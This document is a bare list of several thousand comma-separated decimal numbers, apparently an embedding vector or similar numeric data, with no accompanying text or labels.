0.00046004357864148915, 0.003222399391233921, -0.014081009663641453, 0.05081375688314438, 0.0408356748521328, -0.010566342622041702, -0.035176463425159454, -0.012725777924060822, -0.031483083963394165, -0.02134118229150772, 0.007286233827471733, -0.0006701697129756212, 0.0012295752530917525, -0.02528773620724678, -0.02004552073776722, 0.011445009149610996, 0.007766522001475096, -0.007334635127335787, -0.01734994910657406, 0.017290377989411354, 0.011690737679600716, -0.008697313256561756, -0.02221984788775444, 0.002660201396793127, 0.019702989608049393, -0.006087374873459339, 0.002628554590046406, 0.016784027218818665, -0.026523826643824577, -0.0029841167852282524, 0.01749887503683567, -0.006571386009454727, 0.01035039871931076, 0.00032275187550112605, -0.0066160643473267555, -0.011199280619621277, -0.04610767588019371, 0.02513881027698517, 0.012547066435217857, 0.04741822928190231, 0.018615825101733208, 0.016307462006807327, -0.015741541981697083, 0.010618466883897781, 0.014699055813252926, -0.0001478794583817944, -0.009777030907571316, -0.03115544468164444, -0.0037808739580214024, 0.00555496197193861, -0.012926829047501087, 0.014728840440511703, 0.026151511818170547, -0.013172557577490807, 0.006679357960820198, 0.0172457005828619, -0.02271130681037903, -0.020119983702898026, 0.007066566962748766, -0.048341576009988785, 0.0184966828674078, 0.014296953566372395, -0.015905361622571945, 0.004706080537289381, -0.003499775193631649, 0.010558895766735077, -0.0071782623417675495, -0.011497133411467075, -0.027268460020422935, -0.03252556920051575, -0.02336658351123333, -0.0029152382630854845, 0.007908002473413944, -0.010074884630739689, -0.006161837838590145, 0.030589522793889046, 0.01315021887421608, -0.01003020629286766, -0.01417036633938551, 0.009575980715453625, 0.018586039543151855, -0.025972798466682434, -0.002985978266224265, -0.010290827602148056, -0.04199730232357979, 0.005860261619091034, 0.020626334473490715, 0.03213835880160332, -0.003644978627562523, -0.0007688335608690977, -0.010469540022313595, -0.007263895124197006, -0.0051193516701459885, -0.00398750975728035, -0.007639934774488211, -0.02335169166326523, 0.00142876454629004, 0.013634230010211468, 0.008466477505862713, 0.010983336716890335, -0.06439585983753204, -0.01199603732675314, -0.020224232226610184, 0.02707485668361187, 0.0075729177333414555, -0.004017294850200415, -0.0015683833044022322, -0.00862285029143095, 0.004393334500491619, -0.015041586942970753, 0.009352590888738632, 0.008272872306406498, -0.013038523495197296, 0.017275486141443253, -0.030619308352470398, 0.033657412976026535, -0.0008688936359249055, 0.019866809248924255, -0.016888275742530823, -0.017662694677710533, 0.005420928355306387, 0.022904910147190094, 0.002878006547689438, -0.011534364894032478, 0.008965381421148777, -0.004214622545987368, 0.012815133668482304, -0.023664437234401703, -0.0010173547780141234, -0.04938406124711037, 0.0030194867867976427, 0.01839243434369564, -0.03410419076681137, -0.008786669000983238, -0.0035295605193823576, 0.00011157859989907593, 0.0030492721125483513, -0.007669719867408276, -0.005253385752439499, 0.04902663826942444, -0.009881280362606049, -0.017171237617731094, -0.027402494102716446, -0.003994956146925688, -0.013745925389230251, -0.039763402193784714, -0.007915448397397995, 0.011266297660768032, 0.0073755900375545025, -0.004184837453067303, -0.007639934774488211, -0.00121375173330307, -0.013314037583768368, 0.03151286765933037, 0.029293863102793694, -0.01813925988972187, 0.017692480236291885, -0.018839213997125626, -0.01670956425368786, 0.031244801357388496, -0.0031758598051965237, 0.03039591945707798, 0.0064931996166706085, 0.00408431189134717, -0.0016614623600617051, 0.0185413621366024, 0.012144964188337326, -0.01442354079335928, 0.018586039543151855, -0.006999550387263298, -0.04777565225958824, 0.00824308767914772, -0.006623510736972094, 0.027417387813329697, 0.02630043774843216, 0.01775205135345459, 0.017469089478254318, -0.007349527906626463, 0.013321484439074993, 0.02017955482006073, 0.025957906618714333, -0.024096323177218437, 0.03729122132062912, -0.003942831885069609, 0.00792289525270462, -0.015369225293397903, 0.03508710861206055, -0.017811620607972145, -0.01773715764284134, -0.03181072324514389, -0.009791923686861992, 0.009419606998562813, -0.020522085949778557, -0.021624142304062843, -0.003207506611943245, -0.004009848926216364, -0.01040252298116684, 0.029591714963316917, 0.01156415045261383, -0.0027346645947545767, 0.0210880059748888, 0.029427895322442055, -0.007524516433477402, -0.014125688001513481, -0.031870290637016296, 0.028325838968157768, -0.014341631904244423, 0.04038889333605766, -0.00003667899363790639, -0.005990572273731232, -0.012063054367899895, 0.025734515860676765, 0.005353911314159632, 0.0072601716965436935, -0.026211081072688103, -0.008444137871265411, -0.010990782640874386, 0.01538411807268858, 0.00009802395652513951, 0.011646060273051262, 0.023828256875276566, -0.028057770803570747, -0.015279869548976421, 0.008578171953558922, 0.000004075847755302675, 0.006437352392822504, 0.01226410549134016, -0.010700375773012638, 0.032346855849027634, -0.0029468850698322058, 0.009501516819000244, 0.032376643270254135, -0.03076823614537716, -0.0017815344035625458, -0.016754241660237312, -0.05045633390545845, -0.031751152127981186, 0.001844828249886632, 0.014274614863097668, -0.05513262748718262, -0.011333314701914787, 0.037469930946826935, 0.029055580496788025, -0.029949139803647995, -0.02592812106013298, -0.02286023274064064, -0.02309851534664631, -0.02017955482006073, 0.009062184020876884, 0.0018653057049959898, 0.004936916753649712, -0.03306170552968979, -0.006366611924022436, 0.034282904118299484, 0.023277226835489273, -0.017856299877166748, 0.02616640366613865, 0.04619703069329262, -0.00022734576486982405, -0.015264976769685745, -0.04199730232357979, -0.019509384408593178, 0.003371326019987464, -0.02437928505241871, -0.0062065161764621735, -0.00964299775660038, 0.039644259959459305, 0.002948746783658862, 0.022443238645792007, -0.012844919227063656, 0.03169158101081848, 0.01953916996717453, -0.03854220360517502, -0.0185413621366024, -0.00459810858592391, -0.00036231050034984946, 0.01684359833598137, 0.0006445729522965848, -0.011720523238182068, -0.004296532366424799, 0.009829155169427395, -0.0118024330586195, -0.009337698109447956, -0.021773068234324455, -0.008123946376144886, -0.011713077314198017, -0.015860682353377342, -0.00007905907841632143, 0.0012537757866084576, -0.0007097283378243446, 0.006891578435897827, -0.0019397690193727612, -0.001189551199786365, 0.014646931551396847, 0.0108641954138875, -0.016798920929431915, -0.002667647786438465, -0.014959677122533321, -0.010521664284169674, -0.024751601740717888, -0.03904855623841286, -0.022904910147190094, 0.04619703069329262, -0.02516859583556652, 0.005744843743741512, -0.02731313928961754, 0.01748398318886757, 0.02974064275622368, 0.032644711434841156, -0.002721633529290557, -0.020373158156871796, 0.019702989608049393, 0.01623299904167652, -0.016411710530519485, 0.031483083963394165, -0.029904460534453392, 0.0025298905093222857, 0.003440204542130232, -0.0051044593565166, 0.006277256179600954, 0.05239237844944, 0.013455518521368504, 0.017856299877166748, -0.0044454592280089855, -0.019449813291430473, -0.019315779209136963, -0.0016251615015789866, -0.009911064989864826, 0.005294340662658215, 0.042473867535591125, -0.024587782099843025, 0.009084522724151611, -0.01623299904167652, -0.002354901749640703, 0.0067687141709029675, -0.0011672122636809945, -0.006943702697753906, 0.015786219388246536, -0.005152860190719366, 0.019732775166630745, -0.02962150052189827, 0.016367033123970032, 0.002743972698226571, 0.003883261000737548, -0.020775260403752327, -0.025198381394147873, -0.023202763870358467, -0.026985500007867813, -0.018347756937146187, 0.002671370981261134, -0.003134904894977808, 0.001334754633717239, 0.0031013963744044304, 0.02449842542409897, -0.018347756937146187, -0.03216814622282982, -0.0185413621366024, 0.006176730617880821, 0.006958595477044582, 0.00994829647243023, -0.0037436424754559994, 0.012234319932758808, 0.01142267044633627, 0.0018429666524752975, 0.00010855352593353018, 0.03726143389940262, 0.04607788845896721, -0.024930313229560852, 0.01837754249572754, -0.020968865603208542, -0.0020644948817789555, 0.0024963822215795517, 0.016396818682551384, 0.006563940085470676, 0.005108182318508625, 0.0058863237500190735, 0.017915869131684303, -0.0016065456438809633, 0.022800661623477936, -0.0017433720640838146, 0.02157946489751339, -0.010491878725588322, -0.02884708158671856, 0.03925705328583717, -0.028430087491869926, -0.007729290518909693, 0.012055608443915844, 0.033508483320474625, 0.0029040686786174774, -0.037618860602378845, 0.005495391320437193, -0.020239124074578285, 0.009315358474850655, 0.025615375488996506, 0.015019247308373451, 0.00913664698600769, -0.0013254467630758882, 0.021370967850089073, 0.005357634276151657, 0.039018768817186356, 0.006225131917744875, 0.016292570158839226, -0.0051267980597913265, 0.016024501994252205, -0.0022283142898231745, 0.01194391306489706, -0.008332443423569202, -0.02400696836411953, -0.016024501994252205, 0.02373890019953251, -0.04023996740579605, 0.0031051195692270994, -0.007520793471485376, 0.004836391191929579, 0.007721844129264355, 0.00880900863558054, 0.01712655834853649, 0.008384567685425282, -0.00932280533015728, -0.01662020944058895, -0.0058416458778083324, 0.013172557577490807, -0.0197923444211483, 0.026896143332123756, 0.0023697945289313793, 0.005190092138946056, -0.0042406851425766945, -0.013894851319491863, -0.013090647757053375, -0.027000391855835915, 0.019330672919750214, -0.02977042645215988, 0.000443987431935966, 0.024215465411543846, -0.025243058800697327, -0.0037957667373120785, 0.0004709803615696728, -0.009687675163149834, -0.01647128164768219, 0.009747246280312538, -0.03127458691596985, -0.039525121450424194, 0.007706951349973679, 0.01647128164768219, 0.10186579078435898, -0.0001548603904666379, -0.011303529143333435, -0.00501510314643383, -0.0034569588024169207, 0.0014334184816107154, -0.00778886117041111, 0.010715268552303314, -0.0105440029874444, 0.031453296542167664, 0.016962740570306778, -0.008004805073142052, -0.001151388743892312, 0.01379804965108633, 0.003187029156833887, 0.019509384408593178, 0.0005715058068744838, -0.000697162642609328, 0.004486413672566414, -0.0068506235256791115, 0.01736484095454216, 0.005502837710082531, 0.013611891306936741, -0.016932955011725426, 0.012681099586188793, -0.01711166650056839, -0.020760368555784225, -0.00692880991846323, -0.025257950648665428, -0.00792289525270462, -0.015041586942970753, 0.017826514318585396, 0.0035016366746276617, -0.012159856967628002, 0.005785798188298941, 0.0024126109201461077, 0.019226424396038055, -0.018481791019439697, 0.007826092652976513, -0.022934695705771446, 0.009821709245443344, -0.017573338001966476, -0.009925957769155502, 0.009583426639437675, -0.005506561137735844, -0.030619308352470398, 0.021609250456094742, 0.003968894015997648, -0.007129861041903496, -0.0018178352620452642, 0.006951149087399244, -0.014594806358218193, 0.018228616565465927, 0.021505001932382584, -0.019688095897436142, 0.017052095383405685, 0.013678908348083496, -0.010983336716890335, -0.02543666400015354, -0.016039395704865456, -0.00647830730304122, -0.0008782015647739172, 0.00575229013338685, 0.007189431693404913, -0.003749227151274681, 0.0043151481077075005, -0.013760818168520927, 0.0008446930442005396, -0.006939979735761881, -0.0016540160868316889, 0.014267168007791042, -0.003468128154054284, 0.0165904238820076, -0.004765651188790798, 0.0016707703471183777, 0.02552601881325245, -0.010946105234324932, 0.023545295000076294, -0.01199603732675314, -0.021549679338932037, 0.02975553460419178, 0.028579015284776688, -0.0003678952343761921, 0.013812942430377007, -0.013954422436654568, 0.029710857197642326, 0.00613205274567008, 0.009724906645715237, 0.000374643481336534, 0.011169495061039925, -0.004259300883859396, 0.0013505781535059214, 0.0015860683051869273, 0.008585618808865547, 0.0010778562864288688, 0.029442789033055305, 0.01989659294486046, -0.01916685327887535, -0.005063504446297884, -0.02080504596233368, 0.0054395440965890884, 0.004754481837153435, 0.04303978756070137, 0.002729079918935895, 0.012435371056199074, 0.006347996182739735, -0.005074673797935247, 0.01863071694970131, 0.0143714165315032, -0.0034215885680168867, -0.026151511818170547, -0.020105091854929924, 0.017305271700024605, -0.025585589930415154, -0.013731032609939575, -0.011467347852885723, 0.005018826574087143, 0.0007260171696543694, -0.022949589416384697, -0.028400301933288574, -0.0060613127425313, -0.006437352392822504, 0.03609980642795563, -0.011191833764314651, -0.006515538785606623, 0.006202792748808861, -0.0070553976111114025, -0.018198831006884575, 0.022145384922623634, 0.03586152568459511, 0.009583426639437675, -0.005800690967589617, 0.012301336973905563, -0.015175620093941689, 0.03255535289645195, -0.022577272728085518, 0.04548218473792076, 0.01245026383548975, -0.00408431189134717, -0.007613872643560171, 0.003339678980410099, 0.03472968190908432, 0.02692592889070511, -0.007989912293851376, 0.013269360177218914, -0.008451584726572037, 0.018183937296271324, 0.0045199221931397915, 0.029189612716436386, 0.014706501737236977, -0.023217657580971718, -0.023843148723244667, 0.003371326019987464, 0.04152073711156845, -0.015399010851979256, 0.005383696407079697, 0.010059991851449013, -0.026523826643824577, -0.017975440248847008, 0.01672445796430111, 0.027670562267303467, 0.02081993781030178, 0.03154265508055687, -0.016173427924513817, -0.007122414652258158, 0.022785769775509834, -0.01072271540760994, -0.05248173326253891, -0.005823030136525631, -0.03502753749489784, 0.0029841167852282524, -0.0008167693158611655, -0.01980723813176155, 0.014572467654943466, 0.019985949620604515, 0.007181985303759575, -0.009911064989864826, -0.014319292269647121, 0.035444531589746475, 0.00918877124786377, -0.004192283842712641, 0.028757726773619652, -0.0009540610481053591, -0.015533044002950191, 0.020343374460935593, -0.02644936367869377, -0.0007962919189594686, 0.01225665956735611, -0.022294312715530396, 0.018809430301189423, 0.020492300391197205, 0.02705996297299862, -0.024811170995235443, -0.0006850623758509755, -0.0255558043718338, -0.009985528886318207, -0.00023455939663108438, -0.035444531589746475, -0.008771777153015137, 0.009233449585735798, -0.013879959471523762, -0.011221619322896004, -0.014200150966644287, -0.022309204563498497, 0.01283002644777298, -0.0210880059748888, -0.006180454045534134, -0.008637743070721626, -0.00006160674820421264, -0.012993846088647842, -0.019837023690342903, 0.010335505940020084, 0.01213007140904665, 0.014006546698510647, 0.02963639423251152, 0.0108641954138875, 0.004966702312231064, -0.0287428330630064, -0.008972827345132828, 0.014505450613796711, -0.012852365151047707, 0.022502809762954712, 0.0011299805482849479, 0.021996458992362022, -0.01992637850344181, 0.020134875550866127, 0.015354332514107227, -0.02694082260131836, -0.018198831006884575, -0.010112116113305092, -0.007863324135541916, 0.0009596457821317017, 0.01903281919658184, 0.017275486141443253, -0.010484432801604271, -0.04038889333605766, 0.008429245091974735, 0.003343402175232768, 0.0082952119410038, -0.025004776194691658, 0.011385438963770866, -0.020775260403752327, -0.05837922543287277, 0.008332443423569202, -0.007148476783186197, -0.0002196667337557301, -0.006105990614742041, -0.004132713191211224, 0.006444798782467842, 0.0472693033516407, -0.022532595321536064, -0.015488366596400738, -0.013887405395507812, 0.00210917298682034, 0.00011128772894153371, 0.04366527870297432, 0.01390974409878254, -0.014095902442932129, 0.0033489868510514498, 0.008451584726572037, -0.014378863386809826, -0.02427503652870655, 0.008473923429846764, 0.002572706900537014, -0.01455012895166874, 0.02935343235731125, -0.019464707002043724, -0.024200571700930595, -0.005744843743741512, -0.012271551415324211, 0.00015148628153838217, -0.01799033395946026, 0.011713077314198017, -0.016754241660237312, 0.010759946890175343, -0.017454197630286217, 0.01775205135345459, -0.02031358890235424, -0.009062184020876884, -0.0008768053376115859, -0.002667647786438465, 0.026911037042737007, 0.01156415045261383, -0.0060910978354513645, 0.02184753306210041, -0.0159500390291214, -0.02297937497496605, 0.011690737679600716, -0.020090198144316673, -0.01712655834853649, -0.035712599754333496, -0.0015925838379189372, 0.0001370590180158615, -0.027745025232434273, 0.009940850548446178, -0.010491878725588322, -0.03166179358959198, 0.025957906618714333, -0.02286023274064064, 0.011951359920203686, 0.0027141873724758625, 0.007040504831820726, 0.013060863129794598, 0.009583426639437675, -0.015413902699947357, 0.006843177136033773, -0.02923429198563099, 0.002233898965641856, 0.014490557834506035, -0.021683713421225548, 0.00631821108981967, -0.008660081773996353, -0.022562379017472267, -0.03979318588972092, -0.0024330883752554655, -0.005190092138946056, 0.004698634147644043, -0.00005322962533682585, -0.0011979283299297094, -0.009925957769155502, -0.003942831885069609, -0.017722265794873238, -0.0042406851425766945, -0.03374676778912544, -0.02527284435927868, 0.014535236172378063, -0.0004174598725512624, 0.0040731425397098064, 0.004411950707435608, -0.02297937497496605, 0.020507192239165306, 0.012182195670902729, 0.02820669859647751, -0.007278787437826395, -0.008272872306406498, 0.0016419157618656754, -0.009151539765298367, 0.005182645749300718, -0.003942831885069609, 0.016635101288557053, -0.02440907061100006, 0.0433972105383873, -0.008905810303986073, 0.0010154932970181108, 0.03755928948521614, -0.012807687744498253, 0.0012677377089858055, -0.003134904894977808, -0.005056058056652546, -0.033538270741701126, -0.020894402638077736, -0.012197088450193405, 0.001806665793992579, 0.0017014864133670926, -0.005409758538007736, 0.01258429791778326, 0.0068133920431137085, 0.01888389326632023, -0.010789732448756695, -0.013559767045080662, -0.025332415476441383, 0.016173427924513817, 0.011906681582331657, 0.014766071923077106, 0.0021799129899591208, -0.014453326351940632, -0.01633724756538868, 0.023455940186977386, 0.011258850805461407, -0.03419354557991028, -0.007744183298200369, 0.0172457005828619, -0.003214953001588583, 0.004032187629491091, 0.02437928505241871, -0.009203664027154446, 0.02516859583556652, -0.005160306580364704, -0.01992637850344181, 0.026747217401862144, 0.005975679960101843, -0.007744183298200369, -0.007840985432267189, 0.0006240955553948879, -0.03154265508055687, 0.02719399705529213, -0.004385888576507568, 0.004992764443159103, -0.012271551415324211, -0.0012146825902163982, -0.005614532623440027, 0.023038944229483604, 0.01199603732675314, 0.04113352671265602, -0.0016428465023636818, 0.0007804684573784471, 0.020790154114365578, -0.012301336973905563, -0.00918877124786377, 0.00025852725957520306, 0.01852646842598915, 0.018958356231451035, -0.007677166257053614, 0.020462514832615852, 0.006031527183949947, 0.017945654690265656, -0.006999550387263298, -0.0204178374260664, 0.04009104147553444, -0.015049032866954803, 0.028504550457000732, -0.007468669209629297, 0.028891760855913162, 0.004430566448718309, -0.0003090226964559406, -0.0010117701021954417, -0.022115599364042282, 0.018675396218895912, 0.002198528964072466, -0.008749437518417835, -0.007491007912904024, -0.0010089777642861009, -0.0344616137444973, -0.04301000386476517, 0.0070107197389006615, -0.012018376961350441, 0.018705181777477264, -0.008220748044550419, 0.023411260917782784, 0.035325389355421066, 0.009255788289010525, 0.004996487405151129, 0.0185413621366024, -0.02006041258573532, 0.02527284435927868, 0.008042036555707455, -0.010514218360185623, -0.00880900863558054, -0.02376868575811386, -0.014706501737236977, 0.014036332257091999, -0.021877316758036613, -0.01930088736116886, -0.0008595857070758939, -0.0016288846964016557, -0.01764780282974243, -0.013142772018909454, 0.0008512085769325495, 0.0016931092832237482, -0.00026201774016954005, 0.009099415503442287, 0.00479543674737215, 0.00031251314794644713, 0.03559345752000809, 0.002447980921715498, -0.011921574361622334, 0.0068059456534683704, 0.017796728760004044, 0.0012360907858237624, 0.010834409855306149, 0.01283002644777298, -0.027372708544135094, 0.019866809248924255, 0.0016139920335263014, 0.002645308617502451, 0.022056030109524727, 0.011742861941456795, -0.01583089679479599, 0.0014827504055574536, -0.02335169166326523, 0.02157946489751339, -0.010476985946297646, 0.002950608264654875, 0.004895961843430996, 0.003909323364496231, -0.007282510865479708, -0.014244829304516315, -0.018288185819983482, -0.011489687487483025, 0.003207506611943245, 0.0007674373919144273, -0.0008837862988002598, 0.0007939649512991309, 0.015279869548976421, -0.00824308767914772, 0.02006041258573532, 0.000029712602554354817, 0.001137426937930286, 0.009583426639437675, 0.006496923044323921, -0.005904939491301775, 0.014847981743514538, -0.004274193197488785, 0.0006287494907155633, 0.024289928376674652, 0.021534785628318787, 0.009240895509719849, 0.009992974810302258, 0.018854107707738876, 0.005573578178882599, -0.0018094581319019198, -0.00784843135625124, 0.00651181535795331, 0.0068953013978898525, 0.027253568172454834, -0.016664886847138405, -0.00683200778439641, -0.002306500682607293, 0.017543554306030273, -0.007952680811285973, -0.0017014864133670926, -0.0023567634634673595, -0.00692880991846323, 0.016545744612812996, -0.009397268295288086, 0.018094582483172417, -0.010253596119582653, 0.005026272963732481, -0.034908395260572433, 0.0012816995149478316, 0.002185497898608446, 0.013961868360638618, -0.00811649952083826, -0.013299145735800266, -0.014148026704788208, 0.0165904238820076, 0.02223474159836769, 0.0020756644662469625, -0.012033268809318542, -0.001869028783403337, -0.015547936782240868, -0.01078228559345007, -0.0072527253068983555, -0.016411710530519485, -0.0031255970243364573, -0.0054469904862344265, 0.007494731340557337, -0.005934725049883127, 0.004434289410710335, -0.012815133668482304, 0.011348206549882889, -0.005204984452575445, -0.01142267044633627, 0.006906471215188503, -0.009628104977309704, 0.0058863237500190735, 0.0015627985121682286, -0.0034588202834129333, -0.022532595321536064, -0.003762258216738701, 0.006120883394032717, -0.007833539508283138, -0.015935145318508148, -0.031602226197719574, 0.0115045802667737, 0.009441946633160114, 0.003954001236706972, -0.0064559681341052055, -0.0017005555564537644, 0.005890047177672386, 0.003477436024695635, 0.004199730232357979, 0.004665125627070665, 0.0026974331121891737, -0.0005286894156597555, 0.02081993781030178, 0.007684612646698952, 0.012167302891612053, 0.002302777487784624, -0.003939108457416296, -0.011407777667045593, 0.014587360434234142, -0.00721177039667964, 0.007059121038764715, -0.006597448606044054, 0.009486624039709568, -0.008138838224112988, -0.025466447696089745, 0.014967123046517372, -0.011705630458891392, 0.017171237617731094, -0.0012509834486991167, -0.01799033395946026, -0.007855878211557865, -0.013649122789502144, -0.015994716435670853, 0.013358715921640396, -0.008555833250284195, -0.020015735179185867, -0.015019247308373451, 0.011392884887754917, 0.02412610873579979, -0.016828706488013268, -0.007915448397397995, -0.00810905359685421, -0.017945654690265656, -0.0039651705883443356, -0.015399010851979256, 0.0030120403971523046, 0.008250533603131771, 0.002451704116538167, -0.002021678490564227, -0.005584747530519962, -0.005867708008736372, 0.013425732962787151, 0.0022692689672112465, 0.03282342106103897, -0.0037864588666707277, -0.020015735179185867, -0.007301126606762409, 0.007893109694123268, -0.019196638837456703, 0.002669509267434478, -0.004188560415059328, 0.0018699596403166652, -0.016798920929431915, 0.002053325530141592, -0.005406035576015711, 0.001474373391829431, -0.049235135316848755, 0.011906681582331657, 0.021028436720371246, 0.008630296215415001, 0.02783438190817833, 0.014416094869375229, 0.006634680088609457, 0.005245939362794161, -0.017037203535437584, 0.013574659824371338, 0.011817325837910175, 0.012576851062476635, 0.013083201833069324, 0.015004354529082775, 0.026791894808411598, -0.003203783417120576, 0.022517701610922813, 0.009598319418728352, 0.02017955482006073, 0.00233070133253932, -0.010149347595870495, -0.008913257159292698, -0.0010052545694634318, -0.010938658379018307, 0.005383696407079697, -0.020239124074578285, 0.003846029518172145, 0.007148476783186197, -0.013008738867938519, -0.008518601767718792, 0.011169495061039925, -0.0011001952225342393, 0.003846029518172145, -0.0002720237534958869, 0.033270202577114105, 0.0027830658946186304, -0.012532173655927181, -0.001768503338098526, -0.01315021887421608, 0.009151539765298367, 0.01404377818107605, 0.02259216457605362, -0.008689867332577705, -0.003572376910597086, 0.013842727057635784, 0.00816862378269434, -0.004545984324067831, -0.004728419706225395, 0.01773715764284134, 0.010052545927464962, 0.025094132870435715, -0.001161627471446991, -0.014810750260949135, -0.008555833250284195, 0.008198409341275692, -0.005938448011875153, 0.003942831885069609, -0.006999550387263298, -0.011258850805461407, -0.017215915024280548, -0.0023660713341087103, 0.009315358474850655, -0.01058868132531643, 0.0033936649560928345, 0.001882990705780685, 0.016679778695106506, -0.008146285079419613, -0.0150118013843894, -0.00631821108981967, 0.003905600169673562, -0.01003020629286766, -0.0026788171380758286, -0.008637743070721626, 0.016396818682551384, -0.007677166257053614, 0.006657018791884184, -0.033270202577114105, 0.001973277423530817, 0.008593064732849598, -0.01072271540760994, 0.0015516290441155434, 0.007494731340557337, -0.002194805769249797, -0.0035016366746276617, 0.017424412071704865, -0.020254017785191536, 0.006381504703313112, 0.012494942173361778, 0.008957934565842152, -0.00424440810456872, -0.014036332257091999, 0.028579015284776688, -0.004233238752931356, 0.005815583746880293, -0.009561087936162949, 0.0056517645716667175, 0.021102899685502052, 0.0026062154211103916, -0.026404686272144318, 0.014282060787081718, -0.031215015798807144, -0.018049903213977814, 0.01569686271250248, -0.00881645455956459, -0.031602226197719574, 0.015756433829665184, 0.008310104720294476, -0.017588231712579727, -0.010097223334014416, -0.010901426896452904, 0.001026662765070796, 0.011348206549882889, 0.01775205135345459, 0.010484432801604271, 0.00769205903634429, -0.00002289164694957435, 0.006128329783678055, 0.004426843021064997, -0.01840732805430889, -0.004065696150064468, -0.001223990460857749, 0.02783438190817833, -0.0049294703640043736, 0.0034569588024169207, 0.004747035447508097, 0.008637743070721626, 0.007379312999546528, -0.01904771290719509, 0.0038609220646321774, -0.026002584025263786, 0.014922445639967918, -0.0204327292740345, 0.012435371056199074, -0.012502388097345829, 0.0184966828674078, -0.0000391514076909516, 0.0037250265013426542, -0.008563279174268246, -0.010424861684441566, 0.003561207326129079, -0.008310104720294476, 0.00045771661098115146, 0.02440907061100006, 0.01487776730209589, 0.0034253117628395557, 0.01900303363800049, -0.01320978906005621, 0.010551449842751026, -0.021743282675743103, -0.04074631631374359, -0.01992637850344181, 0.004851283971220255, -0.011318421922624111, 0.02845987305045128, -0.014416094869375229, 0.0054916683584451675, -0.00392421567812562, 0.01487776730209589, -0.012621529400348663, 0.01463203877210617, -0.0013310314388945699, 0.017662694677710533, -0.0011355653405189514, -0.014185258187353611, 0.016679778695106506, 0.027134425938129425, -0.005648041144013405, 0.0060613127425313, 0.01481819711625576, 0.0017228946089744568, -0.026121726259589195, 0.0012472602538764477, 0.000017583228327566758, -0.014572467654943466, -0.00421834597364068, 0.0001436908933101222, -0.005897493567317724, -0.011526918970048428, 0.009039844386279583, -0.005640594754368067, -0.018943464383482933, -0.013395947404205799, -0.011579043231904507, -0.006050142925232649, 0.004266747273504734, 0.01670956425368786, 0.03133415803313255, 0.00645224517211318, 0.009106861427426338, 0.0009461492882110178, 0.0026992945931851864, 0.0005454436759464443, -0.006753821391612291, -0.040299538522958755, 0.005808137357234955, 0.015905361622571945, 0.0033136168494820595, -0.0028444980271160603, 0.019122175872325897, 0.03329998627305031, -0.023709114640951157, 0.014244829304516315, 0.015562829561531544, -0.002757003763690591, -0.005443267058581114, 0.000748821534216404, -0.008205855265259743, 0.00938237551599741, 0.00784843135625124, 0.016128750517964363, -0.0036952411755919456, -0.02580898068845272, 0.01309809461236, 0.004761928226798773, 0.00026201774016954005, -0.007330911699682474, 0.006526708137243986, 0.001196066732518375, -0.00798246543854475, -0.022056030109524727, 0.022264527156949043, 0.002790512051433325, -0.012442816980183125, 0.013083201833069324, -0.01687338389456272, 0.009389822371304035, -0.02552601881325245, -0.0050448887050151825, -0.010439754463732243, -0.005800690967589617, -0.01852646842598915, 0.0031646902207285166, 0.013142772018909454, -0.02080504596233368, 0.009985528886318207, -0.0011848972644656897, 0.007368143647909164, 0.013976761139929295, -0.01813925988972187, -0.0029115150682628155, 0.0016903169453144073, 0.011899235658347607, 0.011742861941456795, 0.018094582483172417, -0.015250083990395069, -0.007613872643560171, -0.013760818168520927, -0.02067101188004017, -0.02248791605234146, -0.028072664514183998, -0.0057262275367975235, -0.00014206201012711972, -0.010655698366463184, 0.009784477762877941, 0.006724035833030939, -0.005823030136525631, 0.004158775322139263, -0.007107521872967482, -0.018988141790032387, -0.03779757022857666, 0.01851157657802105, 0.003976340405642986, 0.016664886847138405, -0.0033750489819794893, -0.010104670189321041, -0.008042036555707455, -0.01551815215498209, -0.002347455592826009, 0.00398750975728035, 0.0023493170738220215, -0.007818646728992462, -0.024543102830648422, 0.019494492560625076, -0.008823901414871216, 0.037469930946826935, 0.028802404180169106, -0.009337698109447956, -0.0017815344035625458, -0.00006143221980892122, 0.00843669194728136, 0.007416544482111931, 0.01673934981226921, -0.013031077571213245, -0.009858940728008747, 0.033657412976026535, 0.017796728760004044, 0.02144543081521988, 0.007639934774488211, -0.009866387583315372, 0.01213007140904665, 0.024855850264430046, 0.0009866387117654085, 0.023813363164663315, 0.004627894144505262, -0.008883471600711346, 0.004858730360865593, -0.0105440029874444, -0.017469089478254318, 0.0020440176595002413, -0.015309654176235199, 0.01672445796430111, 0.021400751546025276, 0.019762560725212097, 0.01700741797685623, -0.0007511485600844026, -0.004851283971220255, -0.014066117815673351, 0.010879088193178177, -0.0048847924917936325, -0.011340760625898838, -0.02988956868648529, -0.012278998270630836, 0.00824308767914772, 0.007289957255125046, 0.032495785504579544, -0.04187816008925438, 0.0018783367704600096, 0.011318421922624111, -0.006601171568036079, -0.018481791019439697, 0.01824350841343403, -0.011966252699494362, -0.006072482094168663, 0.009374929592013359, -0.024572888389229774, -0.025898335501551628, -0.025094132870435715, -0.00450130645185709, -0.014952230267226696, -0.0015022971201688051, -0.0030976731795817614, 0.0223687756806612, -0.007840985432267189, 0.0037845971528440714, -0.013135326094925404, -0.02157946489751339, -0.0204327292740345, -0.015250083990395069, 0.005517730489373207, 0.03565302863717079, -0.03764864429831505, -0.009114308282732964, -0.018169045448303223, 0.01672445796430111, 0.013760818168520927, -0.00479543674737215, 0.007342081516981125, 0.0003148401447106153, -0.024572888389229774, 0.003395526437088847, -0.008741991594433784, -0.005111905746161938, -0.02476649358868599, 0.00561825605109334, -0.009106861427426338, -0.00900261290371418, 0.003631947562098503, 0.006463414523750544, -0.0016791473608464003, 0.006247471086680889, 0.007840985432267189, 0.0006157184252515435, -0.02245813049376011, -0.031066088005900383, -0.029144935309886932, -0.00501510314643383, -0.007811200339347124, -0.01888389326632023, 0.012219427153468132, 0.018154151737689972, -0.031185230240225792, -0.01584579050540924, -0.024677136912941933, 0.008049482479691505, 0.01942002773284912, 0.027908844873309135, 0.007085183169692755, 0.015681970864534378, 0.005435820668935776, 0.00970256794244051, -0.026538720354437828, 0.0010825102217495441, -0.007639934774488211, -0.0006385227898135781, -0.00880900863558054, -0.01544368825852871, 0.0040805889293551445, -0.0011160187423229218, 0.01583089679479599, 0.0028109895065426826, -0.004434289410710335, 0.026151511818170547, -0.0005719712353311479, -0.03204900398850441, -0.0076548270881175995, 0.01751376874744892, 0.0028202973771840334, -0.013500195927917957, 0.027045071125030518, 0.0013198619708418846, -0.00734580447897315, -0.004575769882649183, 0.009203664027154446, 0.01283002644777298, -0.03374676778912544, -0.025094132870435715, -0.007304849568754435, -0.0048773461021482944, -0.021222040057182312, 0.020209340378642082, -0.007811200339347124, 0.03076823614537716, 0.013865066692233086, -0.0024126109201461077, 